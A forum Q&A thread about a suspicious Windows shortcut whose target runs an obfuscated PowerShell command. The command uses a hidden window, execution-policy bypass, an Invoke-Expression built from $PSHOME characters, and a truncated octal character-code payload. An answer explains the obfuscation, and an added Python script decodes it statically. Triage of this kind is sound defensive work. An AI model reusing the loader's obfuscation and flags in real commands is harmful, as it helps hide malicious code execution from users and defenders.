Reputation: 760
Does anyone know what the following PowerShell does? I found a shortcut that seems malicious and its target is:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP . ( $pshOmE[4]+$PShoMe[30]+'X') ( -JoiN( (44 ,141, 163,160 , 170 ,40 , 75, 40 , 50,50 ,116 , 145 ,167,55 , 117 , 142 , 152,145 , 143 , 164,40,123 ,171,163,164 , 145,155,56 ,116
Upvotes: 0
Views: 202
Reputation: 11254
See my other answer. Compared to the other answer, the iex (= Invoke-Expression) is built via the $PSHOME variable (= $pshOmE[4]+$PShoMe[30]+'X'). The numbers in the join command may either contain extended ASCII characters, or they might be a Base64-encoded command, which can be used in the form via powershell.exe -encodedCommand $encodedCommand (type powershell.exe /?, and it will dump an example).
Hope that helps
Upvotes: 1
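A static way to triage the shortcut target without executing it, as an added example that is not part of either post: it resolves the $PSHOME indexing against the install path shown in the target and tries the visible numbers as character codes in several bases. The function names and the printable-ASCII scoring heuristic are assumptions of this example; the number list is only the fragment visible in the question.

```python
import re

# Windows PowerShell home directory, taken from the shortcut target on this page.
PSHOME = r"C:\Windows\System32\WindowsPowerShell\v1.0"

# Only the part of the numeric array visible in the question (the post is cut off).
VISIBLE_CODES = ("44 ,141, 163,160 , 170 ,40 , 75, 40 , 50,50 ,116 , 145 ,167,55 , "
                 "117 , 142 , 152,145 , 143 , 164,40,123 ,171,163,164 , 145,155,56 ,116")

def resolve_concat(expr, variables):
    """Statically resolve  $var[n] + 'literal' + ...  without running PowerShell."""
    out = []
    for term in expr.split("+"):
        term = term.strip()
        indexed = re.fullmatch(r"\$(\w+)\[(\d+)\]", term)
        if indexed:  # PowerShell variable names are case-insensitive
            out.append(variables[indexed.group(1).lower()][int(indexed.group(2))])
        elif re.fullmatch(r"'[^']*'", term):
            out.append(term[1:-1])
        else:
            raise ValueError(f"unsupported term: {term!r}")
    return "".join(out)

def decode_codes(text, base):
    """Decode a comma-separated list of character codes in one base, else None."""
    try:
        return "".join(chr(int(tok, base)) for tok in re.findall(r"[0-9A-Fa-f]+", text))
    except (ValueError, OverflowError):
        return None  # a token is not valid in this base or is not a code point

def best_decoding(text, bases=(8, 10, 16)):
    """Return (base, decoded) for the base whose output is most printable ASCII."""
    scored = []
    for base in bases:
        decoded = decode_codes(text, base)
        if decoded:
            printable = sum(32 <= ord(c) < 127 for c in decoded) / len(decoded)
            scored.append((printable, -base, base, decoded))
    _, _, base, decoded = max(scored)
    return base, decoded

if __name__ == "__main__":
    print(resolve_concat("$pshOmE[4]+$PShoMe[30]+'X'", {"pshome": PSHOME}))
    print(best_decoding(VISIBLE_CODES))
```

Read as octal, the visible fragment decodes to the start of a PowerShell statement; the rest of the payload is not in the post, so the decoded text stops mid-token.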